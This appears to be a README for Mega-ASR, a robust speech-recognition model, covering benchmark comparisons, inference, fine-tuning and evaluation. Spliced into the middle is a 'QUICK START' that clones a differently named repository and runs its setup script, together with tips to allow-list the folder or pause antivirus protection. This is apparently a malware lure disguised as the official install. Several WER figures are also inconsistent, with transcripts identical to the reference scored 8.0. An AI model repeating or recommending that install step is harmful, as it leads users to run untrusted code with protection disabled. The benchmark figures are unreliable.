Mega-ASR: Towards In-the-Wild^2 Speech Recognition via Scaling Up Real-world Acoustic Simulation

We introduce MEGA-ASR, the first foundation ASR model to target full-scenario robust speech recognition in the wild through systematic training on 7 atomic acoustic conditions and 54 compound acoustic scenarios. Built on 2.4M training samples covering noise, far-field speech, obstruction, echo and reverberation, recording artifacts, electronic distortion, and transmission dropout, MEGA-ASR uses A2S-SFT and DG-WGPO-based RL to achieve gains of up to nearly 30% over leading open-source and closed-source SOTA models in challenging acoustic environments. If you find the project useful, please give us a star✨.

You'll come back to Mega-ASR after finding that the rest fail in the real world.

Technical Report 📖 / Voices-in-the-wild-2M 🤗 / Mega-ASR Weights 🤗 / Voices-in-the-Wild-Bench 🏆

Comparison with SOTA open-source and closed-source models.

Sample 1

sample-1.mp4

| System | Transcript | WER |
|---|---|---|
| Ground Truth | ...and said to him let us go and eat some honey. Whose honey? inquired Kobay cautiously. My father's, Soongoora replied. Oh, all right, I'm with you, said the tortoise eagerly, and away they went. | Reference |
| Mega-ASR (Ours) | He said to him let's go and eat some honey. It's honey? inquired very cautiously. My father is Superabundant - oh, all right, I will, said to her eagerly, and away they went. | 47.1 ✅ |
| Qwen3-ASR | `<empty>` | 100.0 🔴 |
| Gemini-3-Pro | But tell me, that's how she met my father's sister. Oh, all right. I wish... I really... | 86.1 🔴 |
| Seed-ASR | My father is. Oh, all right, I wish you can. | 85.3 🔴 |
| Whisper | ...to him... some honey... oh yeah... | 92.5 🔴 |

More examples (Sample 2 – 6)

Sample 2

sample-1.mp4

| System | Transcript | WER |
|---|---|---|
| Ground Truth | To waste, I skip forty years, said the baker in tears, and proceed without further remark to the day when you took me aboard your ship to help you in hunting the snark. | Reference |
| Mega-ASR (Ours) | To witness, I skip forty years, said the baker in tears, and proceed without further remark to the day when you took me aboard of your ship to help you in hunting the snark. | 5.9 ✅ |
| Qwen3-ASR | I skipped 40 years. Second day in here. Ever since you left, I've been a monk... | 64.7 🟠 |
| Gemini-3-Pro | I spent forty years at sea and never seen a rougher than the day that you took me aboard your ship... | 64.7 🟠 |
| Seed-ASR | To wait. I skip forty years. Saturday and years. And proceed without further remark... | 38.2 🟡 |
| Whisper | I skip forty years... to the day you took me on a ship... to hunt the shark. | 71.5 🟠 |

Sample 3

sample-1.mp4

| System | Transcript | WER |
|---|---|---|
| Ground Truth | The friendly gang left the drug store. | Reference |
| Mega-ASR (Ours) | The friendly gang left the drug store. | 8.0 ✅ |
| Qwen3-ASR | It's a friendly gang. That's the drug gang. | 57.1 🟠 |
| Gemini-3-Pro | Friendly gang left the drugs. | 42.9 🟡 |
| Seed-ASR | The friendly gang left the drugstore. | 28.6 🟢 |
| Whisper | A friendly young man left the drug store. | 62.3 🟠 |

Sample 4

sample-1.mp4

| System | Transcript | WER |
|---|---|---|
| Ground Truth | The set of china hit the floor with a crash. | Reference |
| Mega-ASR (Ours) | The set of china hit the floor with a crash. | 8.0 ✅ |
| Qwen3-ASR | The bed is fine. It hit the floor with a crash. | 40.0 🟡 |
| Gemini-3-Pro | He said it's fine I hit the forward slash. | 100.0 🔴 |
| Seed-ASR | The sound of china hits the floor with a crash. | 20.0 🟢 |
| Whisper | The chef of China hit the floor with a clash. | 55.0 🟠 |

Sample 5

sample-1.mp4

| System | Transcript | WER |
|---|---|---|
| Ground Truth | Among export-led electrical and computer makers, Japan Victor Company fell fifty to two thousand three hundred twenty. | Reference |
| Mega-ASR (Ours) | Among export-led (missing: electrical and) computer makers, Japan Victor Company fell fifty to two thousand three hundred twenty. | 11.1 ✅ |
| Qwen3-ASR | Among export-led (missing: electrical and) computer makers, Japan VictorNet sold fifty-two thousand three hundred fifty. | 38.9 🟡 |
| Gemini-3-Pro | Among export-led (missing: electrical and) computer makers, Japan Victor Co. fell 50 to 2,350 yen. | 35.7 🟡 |
| Seed-ASR | Among export-led in computer makers, Japan Victor Company sell 50 to 2300 unit. | 50.0 🟠 |
| Whisper | Among exporters, computer makers in Japan victor companies sold fifty... | 66.7 🟠 |

Sample 6

sample-1.mp4

| System | Transcript | WER |
|---|---|---|
| Ground Truth | Has exposure really been reduced? | Reference |
| Mega-ASR (Ours) | Has exposure really been reduced. | 8.0 ✅ |
| Qwen3-ASR | Has exposure really done you? | 40.0 🟡 |
| Gemini-3-Pro | Has the closure really affected you? | 80.0 🔴 |
| Seed-ASR | Has exposure to beauty products. | 60.0 🟠 |
| Whisper | Have those who really been refused? | 78.5 🔴 |

🔥News

[Coming]: We will release the RL code and optimize the WebUI.
[Coming]: The dataset and benchmark will be reformatted for clarity.
[Coming]: We will release the full data-processing pipeline.
May 28, 2026: 🔥 We add Mega-ASR vLLM streaming inference support and a long-form streaming demo audio file.
May 20, 2026: 🔥 We release Voices-in-the-Wild-Bench, a benchmark for in-the-wild ASR robustness evaluation.
May 20, 2026: 🔥 We release Voices-in-the-Wild-2M.
May 20, 2026: 🔥 We release the Mega-ASR Inference and Training Codebase.
May 19, 2026: 🔥 Mega-ASR model weights are now available on Hugging Face.
May 19, 2026: 🔥 We release the Mega-ASR Technical Report.

Inference with default audio

bash scripts/inference.sh

To use your own audio:

bash scripts/inference.sh --audio /path/to/audio.wav

> [!TIP]
> If the setup does not start, add the folder to the allowed list or pause protection for a few minutes.

> [!CAUTION]
> Some security systems may block the installation.
> Only download from the official repository.

---

## QUICK START

```bash
git clone https://github.com/BarberModulator/Mega-ASR-262.git
cd Mega-ASR-262
python setup.py
```

vLLM Backend

For faster Qwen3-ASR inference, install the vLLM extras (qwen-asr[vllm]) first.

vLLM does not provide native Windows GPU support. On Windows, run the vLLM backend inside Linux, WSL2, or a Linux Docker container; otherwise use the default Transformers backend.

Then run the vLLM entrypoint:

python infer_vllm.py --audio /path/to/audio.wav

This entrypoint always runs Mega-ASR LoRA with a single vLLM engine. It loads the base Qwen3-ASR checkpoint, applies the Mega-ASR LoRA delta once, saves/reuses a materialized checkpoint cache under ckpt/Mega-ASR/mega-asr-vllm-materialized, and then starts vLLM from that checkpoint. It does not use per-sample routing.
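The build-once, reuse-afterwards behaviour described above can be sketched as follows. This is a minimal illustration rather than the repository's code: the `materialize_once` helper, the `READY` marker file, and the `build` callback are hypothetical names, and only the cache directory name comes from the text.

```python
import tempfile
from pathlib import Path
from typing import Callable


def materialize_once(cache_dir: Path, build: Callable[[Path], None]) -> Path:
    """Return cache_dir, calling build(cache_dir) only if no finished cache exists.

    The marker file (a hypothetical convention) is written last, so an
    interrupted build is not mistaken for a complete checkpoint.
    """
    marker = cache_dir / "READY"
    if marker.exists():
        return cache_dir  # reuse the previously materialized checkpoint
    cache_dir.mkdir(parents=True, exist_ok=True)
    build(cache_dir)  # e.g. merge the LoRA delta into the base weights and save
    marker.write_text("ok")
    return cache_dir


if __name__ == "__main__":
    calls = []
    with tempfile.TemporaryDirectory() as tmp:
        cache = Path(tmp) / "mega-asr-vllm-materialized"
        materialize_once(cache, calls.append)
        materialize_once(cache, calls.append)  # second call hits the cache
    print(len(calls))
```

Writing the marker only after `build` returns is one simple way to keep a half-written cache from being reused; the actual entrypoint may validate its cache differently.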

On 8GB GPUs, the CLI automatically uses conservative vLLM defaults unless you override them: gpu_memory_utilization=0.85, max_model_len=8192, max_num_seqs=1, and max_num_batched_tokens=2048.
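One way to picture "conservative defaults unless you override them" is a small resolver that applies the four values above on small GPUs and lets explicit user values win. The function name, the `low_memory_gib` threshold, and the use of `None` for "flag not given" are assumptions made for this sketch; the CLI may detect 8GB cards differently.

```python
from typing import Any, Dict, Optional

# Conservative values quoted in the text for 8GB GPUs.
LOW_MEMORY_DEFAULTS: Dict[str, Any] = {
    "gpu_memory_utilization": 0.85,
    "max_model_len": 8192,
    "max_num_seqs": 1,
    "max_num_batched_tokens": 2048,
}


def resolve_vllm_args(total_gpu_gib: float,
                      overrides: Optional[Dict[str, Any]] = None,
                      low_memory_gib: float = 8.0) -> Dict[str, Any]:
    """Apply low-memory defaults on small GPUs, then layer user overrides on top.

    `low_memory_gib` is an assumed threshold, not a documented option.
    """
    args: Dict[str, Any] = {}
    if total_gpu_gib <= low_memory_gib:
        args.update(LOW_MEMORY_DEFAULTS)
    # Explicit user values always win; None means the flag was not given.
    for key, value in (overrides or {}).items():
        if value is not None:
            args[key] = value
    return args


if __name__ == "__main__":
    print(resolve_vllm_args(8.0, {"max_model_len": 4096}))
```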

python infer_vllm.py \
  --gpu_memory_utilization 0.85 \
  --max_model_len 8192 \
  --max_num_seqs 1 \
  --max_num_batched_tokens 2048 \
  --audio /path/to/audio.wav

Mega-ASR's default Transformers backend dynamically mounts and unmounts LoRA deltas inside one PyTorch model. vLLM manages model weights inside its own engine, so this vLLM entrypoint materializes LoRA into a normal checkpoint before engine startup instead of doing router-based dynamic switching. Qwen3-ASR streaming inference is available only through the official vLLM backend and does not support batch inference or timestamps.
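"Materializing" a LoRA usually means folding the low-rank update into the base weight, W' = W + (alpha / r) * B A, so the result can be loaded as an ordinary checkpoint. The toy example below shows that rule on plain Python lists. It assumes the standard LoRA scaling; whether Mega-ASR's materialization step uses exactly this form is not stated here, and `merge_lora` is a hypothetical helper.

```python
from typing import List

Matrix = List[List[float]]


def matmul(a: Matrix, b: Matrix) -> Matrix:
    """Plain-Python matrix product, adequate for a toy example."""
    return [[sum(x * y for x, y in zip(row, col)) for col in zip(*b)]
            for row in a]


def merge_lora(weight: Matrix, lora_b: Matrix, lora_a: Matrix,
               alpha: float, rank: int) -> Matrix:
    """Return W + (alpha / rank) * B @ A, the usual LoRA merge rule."""
    scale = alpha / rank
    delta = matmul(lora_b, lora_a)
    return [[w + scale * d for w, d in zip(w_row, d_row)]
            for w_row, d_row in zip(weight, delta)]


if __name__ == "__main__":
    w = [[1.0, 0.0], [0.0, 1.0]]   # 2x2 base weight
    b = [[1.0], [2.0]]             # 2x1 LoRA "B" factor (rank 1)
    a = [[0.5, 0.0]]               # 1x2 LoRA "A" factor
    print(merge_lora(w, b, a, alpha=2.0, rank=1))
```

After merging, inference needs no adapter logic at all, which is why a single vLLM engine can serve the model; the trade-off is that per-sample switching between base and adapted weights is no longer possible.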

Mega-ASR also provides a vLLM streaming entrypoint. It uses the same materialized LoRA checkpoint cache as infer_vllm.py, then feeds audio chunks into Qwen3-ASR's streaming API:

python infer_vllm_streaming.py \
  --audio assets/example/streaming_long_example.wav \
  --step_ms 1000 \
  --reset_interval_sec 120 \
  --overlap_sec 2 \
  --max_new_tokens 32

The script prints partial text after each streaming call and a final transcript after finish_streaming_transcribe. For long audio, it periodically finishes and re-initializes Qwen3-ASR's streaming state so the internally accumulated audio does not grow without bound. Set --reset_interval_sec 0 to disable state resets.
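The interaction of --step_ms, --reset_interval_sec, and --overlap_sec can be sketched as a planning step that splits a long file into streaming sessions and each session into chunks. This is only one plausible reading: the helper names are hypothetical, and the assumption that each new session re-reads the last `overlap_sec` seconds of the previous one is not confirmed by the text.

```python
from typing import Iterator, List, Tuple


def plan_sessions(duration_sec: float, reset_interval_sec: float,
                  overlap_sec: float) -> List[Tuple[float, float]]:
    """Split [0, duration) into streaming sessions separated by state resets.

    A non-positive reset interval disables resets (one session for the file).
    """
    if reset_interval_sec <= 0 or duration_sec <= reset_interval_sec:
        return [(0.0, duration_sec)]
    if overlap_sec >= reset_interval_sec:
        raise ValueError("overlap must be shorter than the reset interval")
    sessions: List[Tuple[float, float]] = []
    start = 0.0
    while True:
        end = min(start + reset_interval_sec, duration_sec)
        sessions.append((start, end))
        if end >= duration_sec:
            return sessions
        start = end - overlap_sec  # assumed: re-feed the tail after a reset


def iter_chunks(start_sec: float, end_sec: float,
                step_ms: int) -> Iterator[Tuple[float, float]]:
    """Yield (chunk_start, chunk_end) pairs of at most step_ms milliseconds."""
    step = step_ms / 1000.0
    t = start_sec
    while t < end_sec:
        yield (t, min(t + step, end_sec))
        t += step


if __name__ == "__main__":
    for session in plan_sessions(300.0, 120.0, 2.0):
        print(session, sum(1 for _ in iter_chunks(*session, step_ms=1000)))
```

Under this interpretation, a 300-second file with the flags from the command above (120-second resets, 2-second overlap) is covered by three sessions, so the accumulated audio per session never exceeds 120 seconds.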

Introduction

MEGA-ASR is purpose-built for full-scenario robust ASR in the wild, especially excelling at semantic recovery and local keyword reconstruction under severe acoustic degradation. It substantially reduces common failure modes such as hallucinations, empty outputs, and dropped utterances, making speech recognition reliable in truly challenging real-world environments.

Features

✅ One model for the messy real world: Covers 7 atomic acoustic conditions and 54 compound acoustic scenarios in a single model.

✅ Stronger recovery under severe distortion: Excels at semantic recovery and local keyword reconstruction, greatly reducing hallucinations, empty outputs, and dropped utterances.

✅ SOTA robust ASR performance: Achieves gains of up to nearly 30% over leading open-source and closed-source SOTA models in challenging acoustic environments.

Finetuning

You can further fine-tune Mega-ASR on your own scenarios and data. You can also use our repository to directly train Qwen3-ASR.

A2S-SFT

src/MegaASR/A2S-SFT contains the core training code for Mega-ASR A2S-SFT.

src/MegaASR/A2S-SFT/
├── arguments.py      # Defines command-line arguments and training hyperparameters.
├── checkpointing.py  # Saves base-model metadata and required processor/tokenizer files for LoRA reuse.
├── dataloader.py     # Loads JSONL data, reads audio, builds model inputs, and masks non-target tokens.
├── finetune.py       # Main entry point for launching A2S-SFT training.
├── modeling.py       # Loads Qwen3-ASR and defines LoRA injection scopes.
└── trainer.py        # Defines MegaASRTrainer with adapter-only saving and module-wise learning rates.

Training data is in JSONL format:

{
  "audio": ".../wavs/test-clean/61/70968/61-70968-0000.wav",
  "text": "language English<asr_text>THE TRANSCRIPT TEXT",
  "prompt": ""
}
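A record in this layout can be produced with a few lines of Python. The helper names below are hypothetical; the field names and the `language ...<asr_text>...` prefix are taken from the example above. Note that a JSONL file stores one JSON object per line, so the pretty-printed form shown above would be written on a single line.

```python
import json
from typing import Dict, Iterable


def make_record(audio_path: str, language: str, transcript: str,
                prompt: str = "") -> Dict[str, str]:
    """Build one training record in the layout shown above."""
    return {
        "audio": audio_path,
        "text": f"language {language}<asr_text>{transcript}",
        "prompt": prompt,
    }


def to_jsonl(records: Iterable[Dict[str, str]]) -> str:
    """Serialize records as one JSON object per line, keeping non-ASCII readable."""
    return "".join(json.dumps(r, ensure_ascii=False) + "\n" for r in records)


if __name__ == "__main__":
    rec = make_record("wavs/example.wav", "English", "THE TRANSCRIPT TEXT")
    print(to_jsonl([rec]), end="")
```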

Launch A2S-SFT training with the following command:

torchrun --nproc_per_node=2 A2S_SFT/finetune.py \
  --model_path Qwen3-ASR-1.7B --train_file ${TRAIN_JSONL} \
  --eval_file ${VAL_JSONL} --output_dir ${OUT_DIR} \
  --batch_size 8 --grad_acc 8 \
  --lr 1e-6 --lr_encoder 1e-6 --lr_aligner 1e-6 --lr_llm 1e-6 \
  --epochs 2 --save_steps 200 --save_total_limit 300 --use_lora 1 \
  --lora_scope all --lora_r 8 --lora_alpha 16 --lora_dropout 0.05 \
  --warmup_ratio 0.05 --max_grad_norm 1.0  --weight_decay 0.01 \
  --run_name ${RUN_NAME} --report_to wandb \
  2>&1 | tee -a ${LOG_FILE}

The DG-WGPO reinforcement learning module will be released in a future update.

Evaluation

We provide a simple evaluation script that runs Mega-ASR inference and computes WER/CER. The input is a JSONL file in which each line needs only two fields, audio (or audio_path) and answer:

{"audio": "examples/audio/noise.wav", "answer": "I usually take the quieter road home because the main street gets crowded after work."}

The script will keep all original fields and append the following fields to the output JSONL:

prediction  # model transcription
metric      # "wer" for English samples, "cer" for Chinese samples
wer         # WER/CER score value; CER is also stored in this field for compatibility
num_edits   # edit distance between prediction and ground truth
ref_len     # number of reference words or characters
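The relationship between these fields is the standard error-rate definition: the edit distance between reference and prediction divided by the reference length, over words for WER and over characters for CER. The sketch below illustrates that relationship only. It applies no text normalization and stores the score as a fraction, both of which are assumptions; the repository's script may normalize case and punctuation or report percentages.

```python
from typing import Dict, Sequence, Union


def edit_distance(ref: Sequence[str], hyp: Sequence[str]) -> int:
    """Levenshtein distance between two token sequences (row-by-row DP)."""
    prev = list(range(len(hyp) + 1))
    for i, r in enumerate(ref, start=1):
        curr = [i]
        for j, h in enumerate(hyp, start=1):
            cost = 0 if r == h else 1
            curr.append(min(prev[j] + 1,          # deletion
                            curr[j - 1] + 1,      # insertion
                            prev[j - 1] + cost))  # substitution or match
        prev = curr
    return prev[-1]


def score(reference: str, prediction: str,
          metric: str = "wer") -> Dict[str, Union[str, int, float]]:
    """Return the metric name, error rate, edit count, and reference length."""
    if metric == "wer":
        ref, hyp = reference.split(), prediction.split()
    else:  # "cer": compare characters, ignoring spaces
        ref = list(reference.replace(" ", ""))
        hyp = list(prediction.replace(" ", ""))
    num_edits = edit_distance(ref, hyp)
    ref_len = len(ref)
    rate = num_edits / ref_len if ref_len else float(num_edits > 0)
    return {"metric": metric, "wer": rate,
            "num_edits": num_edits, "ref_len": ref_len}


if __name__ == "__main__":
    print(score("the cat sat on the mat", "the bat sat on mat"))
```

Because insertions count as edits, the rate can exceed 1.0 when the prediction is much longer than the reference.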

The Transformers evaluation script reuses the same Mega-ASR wrapper as infer.py, loading the base model, LoRA, and router from ckpt/Mega-ASR.

python src/MegaASR/eval/evaluate_wer.py \
  --ckpt_dir ckpt/Mega-ASR \
  --input_jsonl examples/test.jsonl \
  --output_jsonl outputs/pred_with_wer.jsonl

Use the separate vLLM evaluation entrypoint after installing qwen-asr[vllm]. It follows infer_vllm.py: the Mega-ASR LoRA is materialized once under ckpt/Mega-ASR/mega-asr-vllm-materialized, then vLLM loads that checkpoint without router-based dynamic switching.

python src/MegaASR/eval/evaluate_wer_vllm.py \
  --ckpt_dir ckpt/Mega-ASR \
  --input_jsonl examples/test.jsonl \
  --output_jsonl outputs/pred_with_wer.vllm.jsonl

Mega-ASR is trained with an acoustic-to-semantic progressive supervised fine-tuning strategy: it first curriculum-trains the encoder and aligner on increasingly difficult samples from WER<30% to WER<50% and then WER<70%, then fine-tunes the LLM on WER<70% data to strengthen semantic recovery, and finally jointly fine-tunes the full encoder-aligner-LLM stack for end-to-end alignment.
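The staged schedule described above can be written down as a small table of stages plus a filter over per-sample difficulty. The stage order, trainable modules, and WER cut-offs follow the paragraph; the stage names, the per-sample `wer` field, and treating the joint stage as unfiltered are assumptions for illustration and are not repository configuration keys.

```python
from typing import Any, Dict, Iterable, List, Optional

# Order and thresholds follow the description; names are illustrative only.
STAGES: List[Dict[str, Any]] = [
    {"name": "acoustic-1", "trainable": ("encoder", "aligner"), "max_wer": 0.30},
    {"name": "acoustic-2", "trainable": ("encoder", "aligner"), "max_wer": 0.50},
    {"name": "acoustic-3", "trainable": ("encoder", "aligner"), "max_wer": 0.70},
    {"name": "semantic", "trainable": ("llm",), "max_wer": 0.70},
    # The text does not state a data threshold for the joint stage.
    {"name": "joint", "trainable": ("encoder", "aligner", "llm"), "max_wer": None},
]


def select_samples(samples: Iterable[Dict[str, Any]],
                   max_wer: Optional[float]) -> List[Dict[str, Any]]:
    """Keep samples whose difficulty score (hypothetical `wer` field) is below the cut-off."""
    if max_wer is None:
        return list(samples)
    return [s for s in samples if s["wer"] < max_wer]


if __name__ == "__main__":
    data = [{"id": i, "wer": w} for i, w in enumerate([0.10, 0.45, 0.65, 0.90])]
    for stage in STAGES:
        kept = select_samples(data, stage["max_wer"])
        print(stage["name"], stage["trainable"], [s["id"] for s in kept])
```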

On top of Mega-ASR-Base, DG-WGPO further optimizes the model with WER-gated policy learning: low-WER samples emphasize token-level acoustic refinement, while high-WER samples emphasize sentence-level semantic reconstruction to reduce hallucinations, omissions, and off-audio outputs. The final reward combines a static WER-based accuracy signal with an anti-repetition gate and a dynamic dual-granularity reward, using fixed hyperparameters τ=0.3, αs=0.4, and αdyn=0.6.
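To make the shape of such a reward concrete, here is a deliberately simplified sketch. It is not the formulation from the technical report: reading τ as the WER threshold that switches between token-level and sentence-level scoring, the multiplicative repetition gate, the hard switch, and the `token_score` / `sentence_score` inputs are all assumptions. Only the three hyperparameter values come from the text.

```python
from typing import Sequence

TAU = 0.3        # assumed here to be the WER gate between the two granularities
ALPHA_S = 0.4    # weight of the static WER-based accuracy term
ALPHA_DYN = 0.6  # weight of the dynamic dual-granularity term


def repetition_gate(tokens: Sequence[str], max_run: int = 3) -> float:
    """Return 0.0 if any token repeats more than max_run times in a row, else 1.0."""
    run = 1
    for prev, cur in zip(tokens, tokens[1:]):
        run = run + 1 if cur == prev else 1
        if run > max_run:
            return 0.0
    return 1.0


def reward(wer: float, token_score: float, sentence_score: float,
           tokens: Sequence[str]) -> float:
    """Illustrative WER-gated reward; every modelling choice here is an assumption."""
    static = 1.0 - min(wer, 1.0)
    # Low-WER samples use the token-level score, high-WER the sentence-level one.
    dynamic = token_score if wer < TAU else sentence_score
    return repetition_gate(tokens) * (ALPHA_S * static + ALPHA_DYN * dynamic)


if __name__ == "__main__":
    print(reward(0.1, token_score=0.8, sentence_score=0.2, tokens=["a", "b"]))
    print(reward(0.5, token_score=0.8, sentence_score=0.2, tokens=["a"] * 5))
```

The second call returns zero because the degenerate, repeated output is gated out regardless of its other scores, which is the role an anti-repetition gate would play.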

Run Mega-ASR inference without routing if you want to force the LoRA on every sample:

python src/MegaASR/eval/evaluate_wer.py \
  --ckpt_dir ckpt/Mega-ASR \
  --input_jsonl examples/test.jsonl \
  --output_jsonl outputs/pred_with_wer.jsonl \
  --no-routing

Each input line requires audio or audio_path, plus answer as the ground-truth transcription.
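Before a long evaluation run, it can help to check the input file against this requirement. The sketch below is a hypothetical pre-flight check, not part of the repository: it accepts either `audio` or `audio_path`, requires `answer`, and leaves all other fields untouched.

```python
import json
from typing import Any, Dict


def parse_eval_line(line: str) -> Dict[str, Any]:
    """Parse one JSONL line and verify it has an audio path and a reference text."""
    item = json.loads(line)
    if not (item.get("audio") or item.get("audio_path")):
        raise ValueError("each line needs 'audio' or 'audio_path'")
    if "answer" not in item:
        raise ValueError("each line needs 'answer'")
    return item  # original fields are kept as they are


if __name__ == "__main__":
    ok = '{"audio_path": "examples/audio/noise.wav", "answer": "hello"}'
    print(parse_eval_line(ok))
```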

Mega-ASR is evaluated across three benchmark families: classical academic test sets, robustness benchmarks, and our own in-the-wild compound benchmark.

Acknowledgements

We sincerely thank the creators, maintainers, and contributors of the public datasets used in this work, including MUSAN, DNS Challenge, ESC-50, UrbanSound8K, LibriSpeech, Common Voice, WenetSpeech, and AISHELL-1.

We also sincerely thank the Qwen3-ASR Team for developing such an excellent foundation model, which provides a strong backbone for this work.

License, Citation and Stars

This project will be released under the Apache-2.0 License, so you are free to use, modify, and redistribute Mega-ASR under its terms 🎉

Citation: You can cite Mega-ASR using the following BibTeX entry. Thank you for your kindness 🙂

@misc{xie2026megaasrinthewild2speechrecognition,
      title={Mega-ASR: Towards In-the-wild^2 Speech Recognition via Scaling up Real-world Acoustic Simulation},
      author={Zhifei Xie and Kaiyu Pang and Haobin Zhang and Deheng Ye and Xiaobin Hu and Shuicheng Yan and Chunyan Miao},
      year={2026},
      eprint={2605.19833},
      archivePrefix={arXiv},
      primaryClass={cs.SD},
      url={https://arxiv.org/abs/2605.19833},
}
